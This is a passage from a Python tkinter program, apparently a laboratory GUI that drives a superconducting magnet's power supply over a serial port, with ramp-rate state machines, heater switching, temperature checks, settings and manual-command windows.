font4, bg = 'yellow')\r\n stage2.place(relx=0.35, rely=0.45, anchor = E)\r\n process2.place(relx=0.35, rely=0.45, anchor = W)\r\n process2b.place(relx=0.35, rely=0.55, anchor=W)\r\n \r\n elif self.state == 'ramp_1':\r\n self.check_current(self.set1, 'up')\r\n\r\n elif self.state == 'set_rate_2':\r\n #Lowers the ramp rate to 0.219 A/sec when I=36 A\r\n self.ser.write(str.encode(f'SR{self.rate2}?\\n'))\r\n reading = self.ser.readline().decode()\r\n start = re.search('RAMP RATE: ', reading).span()[1] + 1\r\n end = re.search(' A/SEC', reading).span()[0] - 1\r\n rate = float(reading[start:end])\r\n if abs(rate-self.rate2) >= 0.05:\r\n print(reading)\r\n print('Error: Rate not set correctly')\r\n self.log_entry(f'Error: Rate not set correctly\\n{reading}')\r\n self.ser.write(str.encode('R0?\\n'))\r\n self.check_current(0, 'down')\r\n return\r\n self.state = 'ramp_2'\r\n self.log_entry(f'state={self.state}')\r\n\r\n process2b = Label(self.status, text = f'R = {self.rate2} A/s', font = font4, bg = 'yellow')\r\n process2b.place(relx=0.35, rely=0.55, anchor=W)\r\n \r\n elif self.state == 'ramp_2':\r\n self.check_current(self.set2, 'up')\r\n\r\n elif self.state == 'set_rate_3':\r\n #Lowers the ramp rate to 0.123 A/sec when I=72 A\r\n self.ser.write(str.encode(f'SR{self.rate3}?\\n'))\r\n reading = self.ser.readline().decode()\r\n start = re.search('RAMP RATE: ', reading).span()[1] + 1\r\n end = re.search(' A/SEC', reading).span()[0] - 1\r\n rate = float(reading[start:end])\r\n if abs(rate-self.rate3) >= 0.05:\r\n print(reading)\r\n print('Error: Rate not set correctly')\r\n self.log_entry(f'Error: Rate not set correctly\\n{reading}')\r\n self.ser.write(str.encode('R0?\\n'))\r\n self.check_current(0, 'down')\r\n return\r\n self.state = 'ramp_3'\r\n self.log_entry(f'state={self.state}')\r\n\r\n process2b = Label(self.status, text = f'R = {self.rate3} A/s', font = font4, bg = 'yellow')\r\n process2b.place(relx=0.35, rely=0.55, anchor=W)\r\n\r\n elif self.state == 'ramp_3':\r\n self.check_current(self.set3, 'up')\r\n\r\n elif self.state == 'set_rate_4':\r\n #Lowers the ramp rate to 0.052 A/sec when I=90 A\r\n self.ser.write(str.encode(f'SR{self.rate4}?\\n'))\r\n reading = self.ser.readline().decode()\r\n start = re.search('RAMP RATE: ', reading).span()[1] + 1\r\n end = re.search(' A/SEC', reading).span()[0] - 1\r\n rate = float(reading[start:end])\r\n if abs(rate-self.rate4) >= 0.05:\r\n print(reading)\r\n print('Error: Rate not set correctly')\r\n self.log_entry(f'Error: Rate not set correctly\\n{reading}')\r\n self.ser.write(str.encode('R0?\\n'))\r\n self.check_current(0, 'down')\r\n return\r\n self.state = 'ramp_4'\r\n self.log_entry(f'state={self.state}')\r\n\r\n process2b = Label(self.status, text = f'R = {self.rate4} A/s', font = font4, bg = 'yellow')\r\n process2b.place(relx=0.35, rely=0.55, anchor=W)\r\n\r\n elif self.state == 'ramp_4':\r\n self.check_current(self.set4, 'up')\r\n\r\n elif self.state == 'heat_off':\r\n #Turns the Heater off\r\n self.ser.write(str.encode('H0?\\n'))\r\n reading = self.ser.readline().decode()\r\n if re.search('HEATER STATUS: SWITCHED OFF', reading) == None:\r\n print(reading)\r\n print('Error: Heater did not turn off')\r\n self.log_entry(f'Error: Heater did not turn off\\n{reading}')\r\n self.ser.write(str.encode('H1?\\n'))\r\n self.state = 'cool_down'\r\n self.log_entry(f'state={self.state}')\r\n\r\n #Stage 2 Process\r\n stage2 = Label(self.status, text = 'Stage 2: ', font = font3, bg = 'white')\r\n process2 = Label(self.status, text = 'Ramping Up', font = font3, bg = 'white')\r\n process2b = Label(self.status, text = 'R = 0.000 A/s', font = font4, bg = 'white')\r\n stage2.place(relx=0.35, rely=0.45, anchor = E)\r\n process2.place(relx=0.35, rely=0.45, anchor = W)\r\n process2b.place(relx=0.35, rely=0.55, anchor=W)\r\n\r\n #Stage 3 Process\r\n stage3 = Label(self.status, text = 'Stage 3: ', font = font3, bg = 'yellow')\r\n process3 = Label(self.status, text = 'Cooling Switch', font = font3, bg = 'yellow')\r\n stage3.place(relx=0.35, rely=0.65, anchor = E)\r\n process3.place(relx=0.35, rely=0.65, anchor = W)\r\n \r\n elif self.state == 'cool_down':\r\n self.check_temperature('down')\r\n \r\n elif self.state == 'finished':\r\n self.switch = False\r\n #Sets the ramp rate\r\n self.ser.write(str.encode('SR0.5?\\n'))\r\n reading = self.ser.readline().decode()\r\n start = re.search('RAMP RATE: ', reading).span()[1] + 1\r\n end = re.search(' A/SEC', reading).span()[0] - 1\r\n rate = float(reading[start:end])\r\n if abs(rate-0.5) >= 0.05:\r\n print(reading)\r\n print('Error: Rate not set correctly')\r\n self.log_entry(f'Error: Rate not set correctly\\n{reading}')\r\n self.ser.write(str.encode('R0\\n'))\r\n self.state = 'supply_down'\r\n self.log_entry(f'state={self.state}')\r\n\r\n #Stage 3 Process\r\n stage3 = Label(self.status, text = 'Stage 3: ', font = font3, bg = 'white')\r\n process3 = Label(self.status, text = 'Cooling Switch', font = font3, bg = 'white')\r\n stage3.place(relx=0.35, rely=0.65, anchor = E)\r\n process3.place(relx=0.35, rely=0.65, anchor = W)\r\n\r\n\r\n #Stage 4 Process\r\n stage4 = Label(self.status, text = 'Stage 4: ', font = font3, bg = 'yellow')\r\n process4 = Label(self.status, text = 'Ramping Down', font = font3, bg = 'yellow')\r\n process4b = Label(self.status, text = 'R = -0.5 A/s', font = font4, bg = 'yellow')\r\n stage4.place(relx=0.35, rely=0.8, anchor = E)\r\n process4.place(relx=0.35, rely=0.8, anchor = W)\r\n process4b.place(relx=0.35, rely=0.9, anchor=W)\r\n \r\n elif self.state == 'supply_down':\r\n self.check_current(0, 'down')\r\n\r\n elif self.state == 'done':\r\n self.create_blank_status()\r\n\r\n self.interlock = False\r\n return\r\n \r\n self.root.after(500, lambda: self.ramp_up())\r\n\r\n\r\n def ramp_down(self):\r\n if self.state == 'abort':\r\n return\r\n\r\n if self.state == 'start':\r\n #Starts the current ramping upward\r\n self.ser.write(str.encode('SR0.5?\\n'))\r\n reading = self.ser.readline().decode()\r\n start = re.search('RAMP RATE: ', reading).span()[1] + 1\r\n end = re.search(' A/SEC', reading).span()[0] - 1\r\n rate = float(reading[start:end])\r\n if abs(rate-0.5) >= 0.05:\r\n print(reading)\r\n print('Error: Rate not set correctly')\r\n self.log_entry(f'Error: Rate not set correctly\\n{reading}')\r\n self.ser.write(str.encode('R0?\\n'))\r\n self.check_current(0, 'down')\r\n return\r\n self.ser.write(str.encode('R!\\n'))\r\n self.state = 'ramp_up'\r\n self.log_entry(f'state={self.state}')\r\n\r\n elif self.state == 'ramp_up':\r\n self.check_current(self.set4, 'up')\r\n \r\n elif self.state == 'heat_on':\r\n #Turns the heater on to warm up the switch\r\n self.ser.write(str.encode('H1?\\n'))\r\n reading = self.ser.readline().decode()\r\n print(reading)\r\n if re.search('HEATER STATUS: ON', reading) == None:\r\n print(reading)\r\n print('Error: Heater did not turn on')\r\n self.log_entry(f'Error: Heater did not turn on\\n{reading}')\r\n self.ser.write(str.encode('R0?\\n'))\r\n self.check_current(0, 'down')\r\n return\r\n self.state = 'warm_up'\r\n self.log_entry(f'state={self.state}')\r\n self.switch = True\r\n\r\n #Stage 1 Process\r\n stage1 = Label(self.status, text = 'Stage 1: ', font = font3, bg = 'white')\r\n process1 = Label(self.status, text = 'Ramping Up', font = font3, bg = 'white')\r\n process1b = Label(self.status, text = 'R = 0.0 A/s', font = font4, bg = 'white')\r\n stage1.place(relx=0.35, rely=0.3, anchor = E)\r\n process1.place(relx=0.35, rely=0.3, anchor = W)\r\n process1b.place(relx=0.35, rely=0.4, anchor = W)\r\n\r\n #Stage 2 Process\r\n stage2 = Label(self.status, text = 'Stage 2: ', font = font3, bg = 'yellow')\r\n process2 = Label(self.status, text = 'Heating Switch', font = font3, bg = 'yellow')\r\n stage2.place(relx=0.35, rely=0.5, anchor = E)\r\n process2.place(relx=0.35, rely=0.5, anchor = W)\r\n\r\n elif self.state == 'warm_up':\r\n self.check_temperature('up')\r\n\r\n elif self.state == 'start_ramp':\r\n #Sets the ramp rate for the downward ramp cycle to rate4\r\n self.ser.write(str.encode(f'SR{self.rate4}?\\n'))\r\n reading = self.ser.readline().decode()\r\n start = re.search('RAMP RATE: ', reading).span()[1] + 1\r\n end = re.search(' A/SEC', reading).span()[0] - 1\r\n rate = float(reading[start:end])\r\n if abs(rate-self.rate4) >= 0.05:\r\n print(reading)\r\n print('Error: Rate not set correctly')\r\n self.state = 'ramp_1'\r\n self.log_entry(f'state={self.state}')\r\n #Ramps the magnet current down\r\n self.ser.write(str.encode('R0\\n'))\r\n\r\n #Stage 2 Process\r\n stage2 = Label(self.status, text = 'Stage 2: ', font = font3, bg = 'white')\r\n process2 = Label(self.status, text = 'Heating Switch', font = font3, bg = 'white')\r\n stage2.place(relx=0.35, rely=0.5, anchor = E)\r\n process2.place(relx=0.35, rely=0.5, anchor = W)\r\n\r\n #Stage 3 Process\r\n stage3 = Label(self.status, text = 'Stage 3: ', font = font3, bg = 'yellow')\r\n process3 = Label(self.status, text = 'Ramping Down', font = font3, bg = 'yellow')\r\n process3b = Label(self.status, text = f'R = -{self.rate4} A/s', font = font4, bg = 'yellow')\r\n stage3.place(relx=0.35, rely=0.65, anchor = E)\r\n process3.place(relx=0.35, rely=0.65, anchor = W)\r\n process3b.place(relx=0.35, rely=0.75, anchor=W)\r\n \r\n elif self.state == 'ramp_1':\r\n self.check_current(self.set3, 'down')\r\n\r\n elif self.state == 'set_rate_2':\r\n #Raises the ramp rate to rate3 when I=set3\r\n self.ser.write(str.encode(f'SR{self.rate3}?\\n'))\r\n reading = self.ser.readline().decode()\r\n start = re.search('RAMP RATE: ', reading).span()[1] + 1\r\n end = re.search(' A/SEC', reading).span()[0] - 1\r\n rate = float(reading[start:end])\r\n if abs(rate-self.rate3) >= 0.05:\r\n print(reading)\r\n print('Error: Rate not set correctly')\r\n self.log_entry(f'Error: Rate not set correctly\\n{reading}')\r\n self.ser.write(str.encode('R0?\\n'))\r\n self.check_current(0, 'down')\r\n return\r\n self.state = 'ramp_2'\r\n self.log_entry(f'state={self.state}')\r\n\r\n process3b = Label(self.status, text = f'R = -{self.rate3} A/s', font = font4, bg = 'yellow')\r\n process3b.place(relx=0.35, rely=0.75, anchor=W)\r\n\r\n elif self.state == 'ramp_2':\r\n self.check_current(self.set2, 'down')\r\n\r\n elif self.state == 'set_rate_3':\r\n #Raises the ramp rate to rate2 when I=set2\r\n self.ser.write(str.encode(f'SR{self.rate2}?\\n'))\r\n reading = self.ser.readline().decode()\r\n start = re.search('RAMP RATE: ', reading).span()[1] + 1\r\n end = re.search(' A/SEC', reading).span()[0] - 1\r\n rate = float(reading[start:end])\r\n if abs(rate-self.rate2) >= 0.05:\r\n print(reading)\r\n print('Error: Rate not set correctly')\r\n self.log_entry(f'Error: Rate not set correctly\\n{reading}')\r\n self.ser.write(str.encode('R0?\\n'))\r\n self.check_current(0, 'down')\r\n return\r\n self.state = 'ramp_3'\r\n self.log_entry(f'state={self.state}')\r\n\r\n process3b = Label(self.status, text = f'R = -{self.rate2} A/s', font = font4, bg = 'yellow')\r\n process3b.place(relx=0.35, rely=0.75, anchor=W)\r\n\r\n elif self.state == 'ramp_3':\r\n self.check_current(self.set1, 'down')\r\n\r\n elif self.state == 'set_rate_4':\r\n #Raises the ramp rate to rate1 when I=set1\r\n self.ser.write(str.encode(f'SR{self.rate1}?\\n'))\r\n reading = self.ser.readline().decode()\r\n start = re.search('RAMP RATE: ', reading).span()[1] + 1\r\n end = re.search(' A/SEC', reading).span()[0] - 1\r\n rate = float(reading[start:end])\r\n if abs(rate-self.rate1) >= 0.05:\r\n print(reading)\r\n print('Error: Rate not set correctly')\r\n self.log_entry(f'Error: Rate not set correctly\\n{reading}')\r\n self.ser.write(str.encode('R0?\\n'))\r\n self.check_current(0, 'down')\r\n return\r\n self.state = 'ramp_down'\r\n self.log_entry(f'state={self.state}')\r\n\r\n process3b = Label(self.status, text = f'R = -{self.rate1} A/s', font = font4, bg = 'yellow')\r\n process3b.place(relx=0.35, rely=0.75, anchor=W)\r\n \r\n elif self.state == 'ramp_down':\r\n self.check_current(0, 'down')\r\n\r\n elif self.state == 'heat_off':\r\n #Turns the Heater off\r\n self.ser.write(str.encode('H0?\\n'))\r\n reading = self.ser.readline().decode()\r\n if re.search('HEATER STATUS: OFF', reading) == None:\r\n print(reading)\r\n print('Error: Heater did not turn off')\r\n self.log_entry(f'Error: Heater did not turn off\\n{reading}')\r\n self.state = 'cool_down'\r\n self.log_entry(f'state={self.state}')\r\n self.switch = False\r\n\r\n #Stage 3 Process\r\n stage3 = Label(self.status, text = 'Stage 3: ', font = font3, bg = 'white')\r\n process3 = Label(self.status, text = 'Ramping Down', font = font3, bg = 'white')\r\n process3b = Label(self.status, text = 'R = -0.000 A/s', font = font4, bg = 'white')\r\n stage3.place(relx=0.35, rely=0.65, anchor = E)\r\n process3.place(relx=0.35, rely=0.65, anchor = W)\r\n process3b.place(relx=0.35, rely=0.75, anchor=W)\r\n\r\n #Stage 4 Process\r\n stage4 = Label(self.status, text = 'Stage 4: ', font = font3, bg = 'yellow')\r\n process4 = Label(self.status, text = 'Cooling Switch', font = font3, bg = 'yellow')\r\n stage4.place(relx=0.35, rely=0.85, anchor = E)\r\n process4.place(relx=0.35, rely=0.85, anchor = W)\r\n\r\n elif self.state == 'cool_down':\r\n self.check_temperature('down')\r\n\r\n elif self.state == 'finished':\r\n self.create_blank_status()\r\n\r\n self.interlock = False\r\n return\r\n\r\n self.root.after(500, lambda: self.ramp_down())\r\n\r\n # Gets the current produced by the supply, and updates the times and current arrays\r\n def get_current(self):\r\n self.ser.write(str.encode('GO?\\n'))\r\n reading = self.ser.readline().decode()\r\n start = re.search('OUTPUT:', reading).span()[1] + 1\r\n end = re.search('AMPS', reading).span()[0] - 1\r\n current = float(reading[start:end].strip())\r\n\r\n self.time_array.append(time.time()-self.initialTime)\r\n self.current_array.append(current)\r\n return current\r\n\r\n #Checks the current to see if it has reached the setpoint yet\r\n def check_current(self, setpoint, dir):\r\n if setpoint == self.set4 or setpoint == 0:\r\n self.ser.write(str.encode('RS?\\n'))\r\n reading = self.ser.readline().decode()\r\n self.log_entry(reading)\r\n\r\n if re.search('RAMP STATUS: HOLDING ON', reading) != None:\r\n if dir == 'up':\r\n if self.state == 'ramp_up':\r\n self.state = 'heat_on'\r\n self.log_entry(f'state={self.state}')\r\n elif self.state == 'ramp_4':\r\n self.state = 'heat_off'\r\n self.log_entry(f'state={self.state}')\r\n elif dir == 'down':\r\n if self.state == 'ramp_down':\r\n self.state = 'heat_off'\r\n self.log_entry(f'state={self.state}')\r\n elif self.state == 'supply_down':\r\n self.state = 'done'\r\n self.log_entry(f'state={self.state}')\r\n elif self.state == 'abort':\r\n self.state = 'done'\r\n self.log_entry(f'state={self.state}')\r\n\r\n else:\r\n self.get_current()\r\n return\r\n \r\n else:\r\n current = self.get_current()\r\n\r\n if dir == 'up':\r\n if current <= setpoint:\r\n return\r\n elif self.state == 'ramp_1':\r\n self.state = 'set_rate_2'\r\n self.log_entry(f'state={self.state}')\r\n elif self.state == 'ramp_2':\r\n self.state = 'set_rate_3'\r\n self.log_entry(f'state={self.state}')\r\n elif self.state == 'ramp_3':\r\n self.state = 'set_rate_4'\r\n self.log_entry(f'state={self.state}')\r\n\r\n if dir == 'down':\r\n if current > setpoint:\r\n return\r\n\r\n elif self.state == 'ramp_1':\r\n self.state = 'set_rate_2'\r\n self.log_entry(f'state={self.state}')\r\n elif self.state == 'ramp_2':\r\n self.state = 'set_rate_3'\r\n self.log_entry(f'state={self.state}')\r\n elif self.state == 'ramp_3':\r\n self.state = 'set_rate_4'\r\n self.log_entry(f'state={self.state}')\r\n \r\n #This statement likely does nothing but I left it for flow of thought (should be called in previous if statement)\r\n elif self.state == 'supply_down':\r\n self.state = 'done'\r\n self.log_entry(f'state={self.state}')\r\n\r\n\r\n #Checks the switch temperature to ensure it is warmed up\r\n def check_temperature(self, dir):\r\n if dir == 'up':\r\n if self.switchTemp < 6:\r\n return\r\n if self.state == 'warm_up':\r\n self.state = 'start_ramp'\r\n self.log_entry(f'state={self.state}')\r\n \r\n if dir == 'down':\r\n self.log_entry(f'switchTemp = {self.switchTemp} K')\r\n if self.switchTemp > 4.5:\r\n return\r\n if self.state == 'heat_switch':\r\n self.state = 'set_rate'\r\n self.log_entry(f'state={self.state}')\r\n elif self.state == 'cool_down' and self.switchTemp < 4.5:\r\n self.state = 'finished'\r\n self.log_entry(f'state={self.state}')\r\n \r\n\r\n def update_data(self, connection):\r\n self.stage1Temp = connection.get_float(\"Temperature_Cryo_S1\")[1]\r\n self.stage2Temp = connection.get_float(\"Temperature_Cryo_S2\")[1]\r\n self.magnetATemp = connection.get_float(\"Temperature_Cryo_MA\")[1]\r\n self.magnetBTemp = connection.get_float(\"Temperature_Cryo_MB\")[1]\r\n self.switchTemp = connection.get_float(\"Temperature_Cryo_Sw\")[1]\r\n\r\n self.stage1b.config(text = f'{self.stage1Temp:.2f} K')\r\n self.stage2b.config(text = f'{self.stage2Temp:.2f} K')\r\n self.magnetAb.config(text = f'{self.magnetATemp:.2f} K')\r\n self.magnetBb.config(text = f'{self.magnetBTemp:.2f} K')\r\n self.switchb.config(text = f'{self.switchTemp:.2f} K')\r\n\r\n self.temps.after(1000, lambda: self.update_data(connection))\r\n\r\n\r\n #Opens Settings Window, which allows the user to change the persistent global variables V and R\r\n def Settings(self):\r\n settings = Toplevel(self.root)\r\n settings.geometry('400x300')\r\n settings.wm_title(\"Settings\")\r\n if platform.system() == 'Windows':\r\n settings.iconbitmap(\"icons/settings.ico\")\r\n settings.configure(bg='grey95')\r\n L1 = Label(settings, text = 'COM Port:', font = font2, bg='grey95')\r\n L1.place(relx=0.3, rely=0.2, anchor = E)\r\n E1 = Entry(settings, font = font2, width = 6)\r\n E1.insert(0,str(self.port))\r\n E1.place(relx=0.3, rely=0.2, anchor = W)\r\n\r\n L2 = Label(settings, text = 'SQL File:', font = font2, bg='grey95')\r\n L2.place(relx=0.8, rely=0.2, anchor = E)\r\n E2 = Entry(settings, font = font2, width = 5)\r\n E2.insert(0,str(self.sqlFile))\r\n E2.place(relx=0.8, rely=0.2, anchor = W)\r\n \r\n L3 = Label(settings, text = 'Rate 1:', font = font2, bg='grey95')\r\n L3.place(relx=0.25, rely=0.4, anchor = E)\r\n E3 = Entry(settings, font = font2, width = 5)\r\n E3.insert(0,str(self.rate1))\r\n E3.place(relx=0.25, rely=0.4, anchor = W)\r\n L3units = Label(settings, text = 'A/s', font = font2, bg = 'grey95')\r\n L3units.place(relx=0.4, rely=0.4, anchor = W)\r\n\r\n L4 = Label(settings, text = 'Set 1:', font = font2, bg='grey95')\r\n L4.place(relx=0.75, rely=0.4, anchor = E)\r\n E4 = Entry(settings, font = font2, width = 5)\r\n E4.insert(0,str(self.set1))\r\n E4.place(relx=0.75, rely=0.4, anchor = W)\r\n L4units = Label(settings, text = 'A', font = font2, bg='grey95')\r\n L4units.place(relx=0.9, rely=0.4, anchor = W)\r\n\r\n L5 = Label(settings, text = 'Rate 2:', font = font2, bg='grey95')\r\n L5.place(relx=0.25, rely=0.5, anchor = E)\r\n E5 = Entry(settings, font = font2, width = 5)\r\n E5.insert(0,str(self.rate2))\r\n E5.place(relx=0.25, rely=0.5, anchor = W)\r\n L5units = Label(settings, text = 'A/s', font = font2, bg = 'grey95')\r\n L5units.place(relx=0.4, rely=0.5, anchor = W)\r\n\r\n L6 = Label(settings, text = 'Set 2:', font = font2, bg='grey95')\r\n L6.place(relx=0.75, rely=0.5, anchor = E)\r\n E6 = Entry(settings, font = font2, width = 5)\r\n E6.insert(0,str(self.set2))\r\n E6.place(relx=0.75, rely=0.5, anchor = W)\r\n L6units = Label(settings, text = 'A', font = font2, bg='grey95')\r\n L6units.place(relx=0.9, rely=0.5, anchor = W)\r\n\r\n L7 = Label(settings, text = 'Rate 3:', font = font2, bg='grey95')\r\n L7.place(relx=0.25, rely=0.6, anchor = E)\r\n E7 = Entry(settings, font = font2, width = 5)\r\n E7.insert(0,str(self.rate3))\r\n E7.place(relx=0.25, rely=0.6, anchor = W)\r\n L7units = Label(settings, text = 'A/s', font = font2, bg = 'grey95')\r\n L7units.place(relx=0.4, rely=0.6, anchor = W)\r\n\r\n L8 = Label(settings, text = 'Set 3:', font = font2, bg='grey95')\r\n L8.place(relx=0.75, rely=0.6, anchor = E)\r\n E8 = Entry(settings, font = font2, width = 5)\r\n E8.insert(0,str(self.set3))\r\n E8.place(relx=0.75, rely=0.6, anchor = W)\r\n L8units = Label(settings, text = 'A', font = font2, bg='grey95')\r\n L8units.place(relx=0.9, rely=0.6, anchor = W)\r\n\r\n L9 = Label(settings, text = 'Rate 4:', font = font2, bg='grey95')\r\n L9.place(relx=0.25, rely=0.7, anchor = E)\r\n E9 = Entry(settings, font = font2, width = 5)\r\n E9.insert(0,str(self.rate4))\r\n E9.place(relx=0.25, rely=0.7, anchor = W)\r\n L9units = Label(settings, text = 'A/s', font = font2, bg = 'grey95')\r\n L9units.place(relx=0.4, rely=0.7, anchor = W)\r\n\r\n L10 = Label(settings, text = 'Set 4:', font = font2, bg='grey95')\r\n L10.place(relx=0.75, rely=0.7, anchor = E)\r\n E10 = Entry(settings, font = font2, width = 5)\r\n E10.insert(0,str(self.set4))\r\n E10.place(relx=0.75, rely=0.7, anchor = W)\r\n L10units = Label(settings, text = 'A', font = font2, bg='grey95')\r\n L10units.place(relx=0.9, rely=0.7, anchor = W)\r\n\r\n b1 = Button(settings, text = 'Update', relief = 'raised', background='lightblue', activebackground='blue', font = font1, width = 10, height = 1,\\\r\n command = lambda: [self.updateSettings(str(E1.get()),str(E2.get()),float(E3.get()),float(E4.get()),float(E5.get()),float(E6.get()),float(E7.get()),float(E8.get()),float(E9.get()), float(E10.get())),settings.destroy()])\r\n b1.place(relx=0.75, rely=0.9, anchor = CENTER)\r\n\r\n b2 = Button(settings, text = 'Reset', relief = 'raised', background='pink', activebackground='red', font = font1, width = 10, height = 1, command = lambda: [self.updateSettings('COM6','data',0.292,36,0.219,72,0.123,90,0.052,108.1),settings.destroy()])\r\n b2.place(relx=0.25, rely=0.9, anchor = CENTER)\r\n\r\n #Updates the persistent global variables port and sql, as well as store the ramp rates and set points\r\n def updateSettings(self, E1, E2, E3, E4, E5, E6, E7, E8, E9, E10):\r\n if not self.interlock:\r\n self.port = E1\r\n self.sqlFile = E2\r\n self.rate1 = E3\r\n self.set1 = E4\r\n self.rate2 = E5\r\n self.set2 = E6\r\n self.rate3 = E7\r\n self.set3 = E8\r\n self.rate4 = E9\r\n self.set4 = E10\r\n f = open(\"variables\",'w')\r\n f.write(f'port={self.port}\\nsqlFile={self.sqlFile}\\nrate1={self.rate1},set1={self.set1}\\nrate2={self.rate2},set2={self.set2}\\\r\n \\nrate3={self.rate3},set3={self.set3}\\nrate4={self.rate4},set4={self.set4}')\r\n f.close()\r\n else:\r\n helpMessage ='Cannot change settings while ramping the magnet' \r\n messageVar = Message(self.root, text = helpMessage, font = font2, width = 600) \r\n messageVar.config(bg='firebrick1')\r\n messageVar.place(relx = 0, rely = 1, anchor = SW)\r\n self.root.after(5000, messageVar.destroy)\r\n\r\n\r\n def manualControl(self):\r\n manual = Toplevel(self.root)\r\n manual.geometry('440x330')\r\n manual.wm_title(\"Manual Serial Control\")\r\n if platform.system() == 'Windows':\r\n manual.iconbitmap(\"icons/serial.ico\")\r\n manual.resizable(False, False)\r\n #manual.configure(bg='white')\r\n manual.configure(bg='grey95')\r\n v = Scrollbar(manual, orient = 'vertical')\r\n t = Text(manual, font = font4, bg='white', width = 10, height = 15, wrap = NONE, yscrollcommand = v.set)\r\n t.insert(END, \"*********************************************************************************************************************\\n\")\r\n t.insert(END, \"\\t\\tBasic Commands\\n\\n\")\r\n t.insert(END, \"\\tSet Ramp Rate: SR{rate}?\\n\")\r\n t.insert(END, \"\\tRamp Up: R!\\n\")\r\n t.insert(END, \"\\tRamp Down: R0?\\n\")\r\n t.insert(END, \"\\tRamp Status: RS?\\n\")\r\n t.insert(END, \"\\tHeater Off: H0?\\n\")\r\n t.insert(END, \"\\tHeater On: H1?\\n\")\r\n t.insert(END, \"\\tGet Output: GO?\\n\")\r\n t.insert(END, \"*********************************************************************************************************************\\n\\n\\n\\n\")\r\n t.pack(side=TOP, fill=X)\r\n v.config(command=t.yview)\r\n\r\n \r\n L1 = Label(manual, text = 'Serial Command:', font = font2, bg='grey95')\r\n L1.place(relx=0.45, rely=0.91, anchor = E)\r\n E1 = Entry(manual, font = font2, width = 7)\r\n E1.place(relx=0.45, rely=0.91, anchor = W)\r\n\r\n b1 = Button(manual, text = 'Send', relief = 'raised', background='lightblue', activebackground='blue', font = font1, width = 5, height = 1,\\\r\n command = lambda: self.updateText(E1.get(), t))\r\n b1.place(relx=0.85, rely=0.91, anchor = CENTER)\r\n\r\n if self.ser is None:\r\n try:\r\n self.ser = serial.Serial(self.port, 9600, timeout=3)\r\n except:\r\n self.interlock = False\r\n helpMessage ='Could not connect to magnet controller. Check connection and try again'\r\n\r\n self.log_entry(helpMessage)\r\n\r\n messageVar = Message(self.root, text = helpMessage, font = font2, width = 600) \r\n messageVar.config(bg='firebrick1')\r\n messageVar.place(relx = 0, rely = 1, anchor = SW)\r\n self.root.after(5000, messageVar.destroy)\r\n manual.destroy()\r\n return\r\n\r\n def updateText(self, text, t):\r\n t.insert(END, f'{text}\\n')\r\n self.ser.write(str.encode(f'{text}\\n'))\r\n if \"?\" in text:\r\n reading = self.ser.readline().decode()\r\n t.insert(END, f'{reading}\\n')\r\n\r\n \r\n\r\n\r\n #Opens a url in a new tab in the default webbrowser\r\n def callback(url):\r\n webbrowser.open_new_tab(url)\r\n\r\n\r\n #Opens About Window with software information\r\n def About(self):\r\n name = \"Magnet Ramp Controller\"\r\n version = 'Version: 2.0.0'\r\n date = 'Date: 02/27/2022'\r\n support = 'Support: '\r\n url = 'https://github.com/rhmatti/Magnet-Ramp-Controller'\r\n copyrightMessage ='Copyright © 2023 Richard Mattish All Rights Reserved.'\r\n t = Toplevel(self.root)\r\n t.wm_title(\"About\")\r\n t.geometry(\"400x300\")\r\n t.resizable(False, False)\r\n t.configure(background='white')\r\n if platform.system() == 'Windows':\r\n t.iconbitmap(\"icons/magnet.ico\")\r\n l1 = Label(t, text = name, bg='white', fg='blue', font=font2)\r\n l1.place(relx = 0.15, rely = 0.14, anchor = W)\r\n l2 = Label(t, text = version, bg='white', font=font4)\r\n l2.place(relx = 0.15, rely = 0.25, anchor = W)\r\n l3 = Label(t, text = date, bg='white', font=font4)\r\n l3.place(relx = 0.15, rely = 0.35, anchor = W)\r\n l4 = Label(t, text = support, bg = 'white', font=font4)\r\n l4.place(relx = 0.15, rely = 0.45, anchor = W)\r\n l5 = Label(t, text = 'https://github.com/rhmatti/\\nMagnet-Ramp-Controller', bg = 'white', fg = 'blue', font=font4)\r\n l5.place(relx = 0.31, rely=0.48, anchor = W)\r\n l5.bind(\"<Button-1>\", lambda e:\r\n rampController.callback(url))\r\n messageVar = Message(t, text = copyrightMessage, bg='white', font = font4, width = 600)\r\n messageVar.place(relx = 0.5, rely = 1, anchor = S)\r\n\r\n def Instructions(self):\r\n instructions = Toplevel(self.root)\r\n instructions.geometry('1280x720')\r\n instructions.wm_title(\"User Instructions\")\r\n instructions.configure(bg='white')\r\n if platform.system() == 'Windows':\r\n instructions.iconbitmap(\"icons/magnet.ico\")\r\n v = Scrollbar(instructions, orient = 'vertical')\r\n t = Text(instructions, font = font4, bg='white', width = 100, height = 100, wrap = NONE, yscrollcommand = v.set)\r\n t.insert(END, \"*********************************************************************************************************************\\n\")\r\n t.insert(END, \"Program: Magnet Ramp Controller\\n\")\r\n t.insert(END, \"Author: Richard Mattish\\n\")\r\n t.insert(END, \"Last Updated: 02/27/2023\\n\\n\")\r\n t.insert(END, \"Function: This program provides a graphical user interface for controlling\\n\")\r\n t.insert(END, \"\\tthe superconducting magnet in the CUEBIT source.\\n\")\r\n t.insert(END, \"*********************************************************************************************************************\\n\\n\\n\\n\")\r\n\r\n t.pack(side=TOP, fill=X)\r\n v.config(command=t.yview)\r\n\r\n def save_data(self):\r\n fileName = str(filedialog.asksaveasfile(initialdir = desktop,title = \"Save\",filetypes = ((\"Text Document\",\"*.txt*\"),(\"Text Document\",\"*.txt*\"))))\r\n fileName = fileName.split(\"'\")\r\n fileName = fileName[1]\r\n outputFile = open(fileName + '.txt', \"w\")\r\n outputFile.write('Time (s)\\tCurrent (°C)\\n\\n')\r\n\r\n for i in range(0,len(self.time_array)-1):\r\n outputFile.write(str(self.time_array[i]) + '\\t' + str(self.current_array[i]) + '\\n')\r\n\r\n outputFile.close()\r\n webbrowser.open(fileName + '.txt')\r\n\r\n def abort(self):\r\n if self.interlock:\r\n\r\n if not self.switch:\r\n #Ramps the magnet current down\r\n self.ser.write(str.encode('R0\\n'))\r\n\r\n #Sets the ramp speed to 0.5 A/s\r\n self.ser.write(str.encode('SR0.5?\\n'))\r\n reading = self.ser.readline().decode()\r\n start = re.search('RAMP RATE: ', reading).span()[1] + 1\r\n end = re.search(' A/SEC', reading).span()[0] - 1\r\n rate = float(reading[start:end])\r\n if abs(rate-0.5) >= 0.05:\r\n print(reading)\r\n print('Error: Rate not set correctly')\r\n self.log_entry(f'Error: Rate not set correctly\\n{reading}')\r\n\r\n elif self.switch:\r\n if self.process == 'energize':\r\n #Ramps the magnet current down\r\n self.ser.write(str.encode('R0\\n'))\r\n\r\n if self.state == 'start_ramp' or self.state == 'ramp_1' or self.state == 